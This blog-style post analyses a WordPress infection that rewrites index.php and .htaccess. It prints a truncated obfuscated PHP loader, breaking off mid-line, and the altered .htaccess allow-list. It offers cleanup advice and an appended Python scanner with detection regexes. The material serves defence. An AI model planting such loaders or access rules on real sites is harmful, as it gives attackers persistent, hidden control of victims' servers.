
A Case of WordPress Website .htaccess File Virus Infection

Today, I encountered a rather potent virus that automatically infects files like index.php and .htaccess in the website directory. After infection, the website becomes inaccessible. The other impacts are unclear. Here, I'll document the virus analysis and solution.

Details of the virus:

First, a large chunk of encrypted code is inserted into the index.php file:
<?php
$O_O_O_0O00=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$O0_0O__0OO=$O_O_O_0O00[44].$O_O_O_0O00[53].$O_O_O_0O00[31].$O_O_O_0O00[65].$O_O_O_0O00[10].$O_O_O_0O00[53].$O_O_O_0O00[31].$O_O_O_0O00[44].$O_O_O_0O00[39].$O_O_O_0O00[21].$O_O_O_0O00[56].$O_O_O_0O00[31].$O_O_O_0O00[10].$O_O_O_0O00[56].$O_O_O_0O00[21
Then, the .htaccess file is consistently altered to look like the following:
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This virus-infected website was using cPanel shared hosting. Strangely, even after deleting all files in the root directory and refreshing, the virus files would regenerate automatically. The reason is unknown, so I directly switched to a new server for installation, and everything returned to normal.

According to information found on the official WordPress forums, this virus started appearing several months ago, but there's no definitive solution. Fortunately, this virus does not infect the database, so reinstalling WordPress can eliminate it (possibly requiring a server OS reinstall or switching to a different server).

Additionally, there's an online method I haven't tested: first, stop the PHP process, then delete the infected files, and finally restart PHP. You can give it a try.
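A scanner for the two patterns shown above, as an added example that is not part of the original post: it flags .htaccess files that pair a blanket PHP deny with an allow-list of named .php files, and PHP files that combine O/0/_ variable names with a percent-encoded urldecode() string. The function names, thresholds and sample strings are assumptions made for this example.

```python
import os
import re
import sys

# <FilesMatch "pattern"> ... </FilesMatch> blocks, as in the altered .htaccess
BLOCK = re.compile(r'<FilesMatch\s+"([^"]*)">(.*?)</FilesMatch>', re.I | re.S)
# Variable names built only from O, 0 and _ (the post shows $O_O_O_0O00)
OBF_VAR = re.compile(r'\$[O0_]{8,}\b')
# urldecode() called on a long run of %xx escapes (threshold is an assumption)
OBF_STR = re.compile(r'urldecode\(\s*"(?:%[0-9a-fA-F]{2}){20,}')

# Constructed samples: the deny/allow pair in the shape the post shows, and a
# harmless stand-in for the injected PHP (same shape, no payload).
SAMPLE_HTACCESS = ('<FilesMatch ".(py|exe|php)$">\nOrder allow,deny\nDeny from all\n</FilesMatch>\n'
                   '<FilesMatch "^(about.php|radio.php|index.php)$">\nOrder allow,deny\nAllow from all\n</FilesMatch>\n')
SAMPLE_PHP = '<?php $O_O_O_0O00=urldecode("' + '%6f%41' * 12 + '");'

def htaccess_suspicious(text):
    """True when PHP is denied wholesale while a list of named .php files is allowed."""
    deny_php = allow_list = False
    for pattern, body in BLOCK.findall(text):
        if 'php' in pattern.lower() and re.search(r'deny\s+from\s+all', body, re.I):
            deny_php = True
        if len(re.findall(r'\w+\.php', pattern)) >= 2 and re.search(r'allow\s+from\s+all', body, re.I):
            allow_list = True
    return deny_php and allow_list

def php_suspicious(text):
    """True when O/0/_ variable names appear with a percent-encoded urldecode() table."""
    return bool(OBF_VAR.search(text) and OBF_STR.search(text))

def scan(root):
    """Return sorted relative paths of .htaccess and .php files matching the heuristics."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name != '.htaccess' and not name.endswith('.php'):
                continue
            with open(os.path.join(dirpath, name), errors='replace') as fh:
                text = fh.read()
            check = htaccess_suspicious if name == '.htaccess' else php_suspicious
            if check(text):
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)

if __name__ == '__main__':
    for hit in scan(sys.argv[1] if len(sys.argv) > 1 else '.'):
        print(hit)
```

Run it against the web root (for example from a cron job) to see which files have been rewritten again after a cleanup; a hit is a heuristic match and still needs manual review.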
